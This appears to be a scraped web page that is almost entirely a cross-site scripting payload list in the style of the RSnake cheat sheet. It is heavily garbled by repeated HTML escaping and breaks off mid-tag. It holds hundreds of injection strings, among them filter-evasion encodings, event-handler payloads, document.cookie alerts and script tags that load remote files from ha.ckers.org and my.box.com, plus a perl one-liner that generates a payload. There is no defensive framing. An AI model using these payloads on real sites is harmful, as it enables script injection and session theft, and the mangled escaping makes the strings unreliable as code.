\\\\\\\&quot;\\\\\\\&quot;\\\\\\\&quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=`javascript&amp;#058;alert(\\\\\\\&quot;RSnake says, \\\&#039;XSS\\\&#039;\\\\\\\&quot;)`&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(&amp;quot;XSS&amp;quot;)&amp;gt;\\r\\n&amp;lt;IMG SRC=JaVaScRiPt&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n\\\&#039;\\\&#039;;!--\\\\\\\&quot;&amp;lt;XSS&amp;gt;=&amp;{()}\\r\\n\\\&#039;;alert(String&amp;#46;fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String&amp;#46;fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String&amp;#46;fromCharCode(88,83,83))//\\\\\\\\\\\&quot;;alert(String&amp;#46;fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\\&#039;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String&amp;#46;fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=javascrscriptipt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot; &amp;#14; javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;a=/XSS/alert(a.source)&lt;/SCRIPT&gt;\\r\\n\\\\\\\&quot;;alert(\\\&#039;XSS\\\&#039;);//\\r\\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/SCRIPT&gt;\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/FRAMESET&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width: expression(alert(\\\&#039;XSS\\\&#039;));\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:alert(\\\&quot;XSS\\\&quot;)\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);xss:&amp;#101;x&amp;#x2F;*XSS*//*/*/pression(alert(\\\&quot;XSS\\\&quot;))\\\&#039;&gt;\\r\\n&lt;EMBED SRC=\\\&quot;http://ha.ckers.org/xss.swf\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;&lt;/EMBED&gt;\\r\\na=\\\&quot;get\\\&quot;;b=\\\&quot;URL(ja\\\\\\\&quot;\\\&quot;;c=\\\&quot;vascr\\\&quot;;d=\\\&quot;ipt:ale\\\&quot;;e=\\\&quot;rt(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;)\\\&quot;;eval(a+b+c+d+e);\\r\\n&lt;SCRIPT SRC=\\\&quot;http://ha.ckers.org/xss.jpg\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\&quot;t\\\&quot; ns=\\\&quot;urn:schemas-microsoft-com:time\\\&quot;&gt;&lt;?import namespace=\\\&quot;t\\\&quot; implementation=\\\&quot;#default#time2\\\&quot;&gt;&lt;t:set attributeName=\\\&quot;innerHTML\\\&quot; to=\\\&quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;\\\&quot;&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;form id=\\\&quot;test\\\&quot; /&gt;&lt;button form=\\\&quot;test\\\&quot; formaction=\\\&quot;javascript:alert(123)\\\&quot;&gt;TESTHTML5FORMACTION\\r\\n&lt;form&gt;&lt;button formaction=\\\&quot;javascript:alert(123)\\\&quot;&gt;crosssitespt\\r\\n&lt;frameset onload=alert(123)&gt;\\r\\n&lt;!--&lt;img src=\\\&quot;--&gt;&lt;img src=x onerror=alert(123)//\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;img src=\\\&quot;&lt;/style&gt;&lt;img src=x onerror=alert(123)//\\\&quot;&gt;\\r\\n&lt;object data=\\\&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&gt;\\r\\n&lt;embed src=\\\&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\&quot;&gt;\\r\\n&lt;embed src=\\\&quot;javascript:alert(1)\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;script&gt;({0:#0=alert/#0#/#0#(123)})&lt;/script&gt;\\r\\n&lt;script&gt;ReferenceError.prototype.__defineGetter__(\\\&#039;name\\\&#039;, function(){alert(123)}),x&lt;/script&gt;\\r\\n&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._(\\\&#039;alert(1)\\\&#039;)()&lt;/script&gt;\\r\\n&lt;script src=\\\&quot;#\\\&quot;&gt;{alert(1)}&lt;/script&gt;;1\\r\\n&lt;script&gt;crypto.generateCRMFRequest(\\\&#039;CN=0\\\&#039;,0,0,null,\\\&#039;alert(1)\\\&#039;,384,null,\\\&#039;rsa-dual-use\\\&#039;)&lt;/script&gt;\\r\\n&lt;svg xmlns=\\\&quot;#\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;/svg&gt;\\r\\n&lt;svg onload=\\\&quot;javascript:alert(123)\\\&quot; xmlns=\\\&quot;#\\\&quot;&gt;&lt;/svg&gt;\\r\\n&lt;iframe xmlns=\\\&quot;#\\\&quot; src=\\\&quot;javascript:alert(1)\\\&quot;&gt;&lt;/iframe&gt;\\r\\n+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-\\r\\n%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-\\r\\n+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-\\r\\n%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-\\r\\n%253cscript%253ealert(document.cookie)%253c/script%253e\\r\\n“&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/script&gt;\\r\\n“&gt;&lt;ScRiPt&gt;alert(document.cookie)&lt;/script&gt;\\r\\n“&gt;&lt;&lt;script&gt;alert(document.cookie);//&lt;&lt;/script&gt;\\r\\nfoo&lt;script&gt;alert(document.cookie)&lt;/script&gt;\\r\\n&lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;\\r\\n%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E\\r\\n‘; alert(document.cookie); var foo=’\\r\\nfoo\\\\’; alert(document.cookie);//’;\\r\\n&lt;/script&gt;&lt;script &gt;alert(document.cookie)&lt;/script&gt;\\r\\n&lt;img src=asdf onerror=alert(document.cookie)&gt;\\r\\n&lt;BODY ONLOAD=alert(’XSS’)&gt;\\r\\n&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n\\\&quot;&gt;&lt;script&gt;alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))&lt;/script&gt;\\r\\n&lt;video src=1 onerror=alert(1)&gt;\\r\\n&lt;audio src=1 onerror=alert(1)&gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n0\\\\\\\&quot;autofocus/onfocus=alert(1)--&gt;&lt;video/poster/onerror=prompt(2)&gt;\\\&quot;-confirm(3)-\\\&quot;\\r\\n&lt;script/src=data:,alert()&gt;\\r\\n&lt;marquee/onstart=alert()&gt;\\r\\n&lt;video/poster/onerror=alert()&gt;\\r\\n&lt;isindex/autofocus/onfocus=alert()&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=JaVaScRiPt:alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=javascript:alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;IMG SRC=`javascript:alert(\\\&quot;RSnake says, \\\&#039;XSS\\\&#039;\\\&quot;)`&gt;\\r\\n&lt;a onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;xxs link&lt;/a&gt;\\r\\n&lt;a onmouseover=alert(document.cookie)&gt;xxs link&lt;/a&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;)&lt;/SCRIPT&gt;\\\&quot;&gt;\\r\\n&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=# onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC= onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG onmouseover=\\\&quot;alert(\\\&#039;xxs\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC=/ onerror=\\\&quot;alert(String.fromCharCode(88,83,83))\\\&quot;&gt;&lt;/img&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;\\r\\n&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;\\r\\n#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x09;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0A;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0D;ascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot; &amp;#14; javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\n\\\\\\\&quot;;alert(\\\&#039;XSS\\\&#039;);//\\r\\n&lt;/script&gt;&lt;script&gt;alert(\\\&#039;XSS\\\&#039;);&lt;/script&gt;\\r\\n&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/SCRIPT&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BODY BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;\\r\\n&lt;IMG SRC=\\\&#039;vbscript:msgbox(\\\&quot;XSS\\\&quot;)\\\&#039;&gt;\\r\\n&lt;IMG SRC=\\\&quot;livescript:[code]\\\&quot;&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;BGSOUND SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BR SIZE=\\\&quot;&amp;{alert(\\\&#039;XSS\\\&#039;)}\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;http://ha.ckers.org/xss.css\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;http://ha.ckers.org/xss.css\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;STYLE&gt;BODY{-moz-binding:url(\\\&quot;http://ha.ckers.org/xssmoz.xml#xss\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:alert(\\\&quot;XSS\\\&quot;)\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);\\r\\nxss:ex/*XSS*//*/*/pression(alert(\\\&quot;XSS\\\&quot;))\\\&#039;&gt;\\r\\n&lt;STYLE TYPE=\\\&quot;text/javascript\\\&quot;&gt;alert(\\\&#039;XSS\\\&#039;);&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:expression(alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;XSS STYLE=\\\&quot;behavior: url(xss.htc);\\\&quot;&gt;\\r\\n¼script¾alert(¢XSS¢)¼/script¾\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\&quot;&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0; URL=http://;URL=javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;IFRAME SRC=# onmouseover=\\\&quot;alert(document.cookie)\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/FRAMESET&gt;</code> <p>keyword(s): z</p> <p>description: \\\&#039;\\\&#039;;!--\\\&quot;&lt;XSS&gt;=&amp;{()}\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;\\r\\n&lt;IMG SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=(\\\&#039;XSS\\\&#039;)&gt;\\r\\n&lt;IMG SRC=(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;IMG SRC=`(\\\&quot;RSnake says, \\\&#039;XSS\\\&#039;\\\&quot;)`&gt;\\r\\n&lt;a =\\\&quot;alert&#40;&#41;\\\&quot;&gt;xxs link&lt;/a&gt;\\r\\n&lt;a =alert&#40;&#41;&gt;xxs link&lt;/a&gt;\\r\\n&lt;IMG \\\&quot;\\\&quot;\\\&quot;&gt;alert&#40;\\\&quot;XSS\\\&quot;&#41;\\\&quot;&gt;\\r\\n&lt;IMG SRC=(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=# =\\\&quot;alert&#40;\\\&#039;xxs\\\&#039;&#41;\\\&quot;&gt;\\r\\n&lt;IMG SRC= =\\\&quot;alert&#40;\\\&#039;xxs\\\&#039;&#41;\\\&quot;&gt;\\r\\n&lt;IMG =\\\&quot;alert&#40;\\\&#039;xxs\\\&#039;&#41;\\\&quot;&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;IMG SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x09;ascript:alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0A;ascript:alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;jav&amp;#x0D;ascript:alert&#40;\\\&#039;XSS\\\&#039;&#41;;\\\&quot;&gt;\\r\\nperl -e \\\&#039;print \\\&quot;&lt;IMG SRC=java\\\\0script:alert&#40;\\\\\\\&quot;XSS\\\\\\\&quot;&#41;&gt;\\\&quot;;\\\&#039; &gt; out\\r\\n&lt;IMG SRC=\\\&quot; &amp;#14; (\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;\\r\\n&lt;BODY !#$%&amp;()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\&quot;XSS\\\&quot;&#41;&gt;\\r\\n&lt;SCRIPT/SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;\\r\\n&lt;alert&#40;\\\&quot;XSS\\\&quot;&#41;;//&lt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;\\r\\n&lt;IMG SRC=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\n\\\\\\\&quot;;alert&#40;\\\&#039;XSS\\\&#039;&#41;;//\\r\\n&lt;/TITLE&gt;alert&#40;\\\&quot;XSS\\\&quot;&#41;;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BODY BACKGROUND=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;\\r\\n&lt;IMG SRC=\\\&#039;(\\\&quot;XSS\\\&quot;)\\\&#039;&gt;\\r\\n&lt;IMG SRC=\\\&quot;\\\&quot;&gt;\\r\\n&lt;BODY =alert&#40;\\\&#039;XSS\\\&#039;&#41;&gt;\\r\\n&lt;BGSOUND SRC=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;BR SIZE=\\\&quot;&amp;{alert&#40;\\\&#039;XSS\\\&#039;&#41;}\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;http://ha.ckers.org/xss.css\\\&quot;&gt;\\r\\n&lt;STYLE&gt;@import\\\&#039;http://ha.ckers.org/xss.css\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;Link\\\&quot; Content=\\\&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\&quot;&gt;\\r\\n&lt;STYLE&gt;BODY{:url(\\\&quot;http://ha.ckers.org/xssmoz.xml#xss\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript:alert&#40;\\\&quot;XSS\\\&quot;&#41;\\\&#039;;&lt;/STYLE&gt;\\r\\n&lt;IMG STYLE=\\\&quot;xss:expr/*XSS*/ession(alert&#40;\\\&#039;XSS\\\&#039;&#41;)\\\&quot;&gt;\\r\\nexp/*&lt;A STYLE=\\\&#039;no\\\\xss:noxss(\\\&quot;*//*\\\&quot;);xss:ex/*XSS*//*/*/pression(alert&#40;\\\&quot;XSS\\\&quot;&#41;)\\\&#039;&gt;\\r\\n&lt;STYLE TYPE=\\\&quot;text/javascript\\\&quot;&gt;alert&#40;\\\&#039;XSS\\\&#039;&#41;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;STYLE type=\\\&quot;text/css\\\&quot;&gt;BODY{background:url(\\\&quot;(\\\&#039;XSS\\\&#039;)\\\&quot;)}&lt;/STYLE&gt;\\r\\n&lt;XSS STYLE=\\\&quot;xss:alert&#40;\\\&#039;XSS\\\&#039;&#41;)\\\&quot;&gt;\\r\\n&lt;XSS 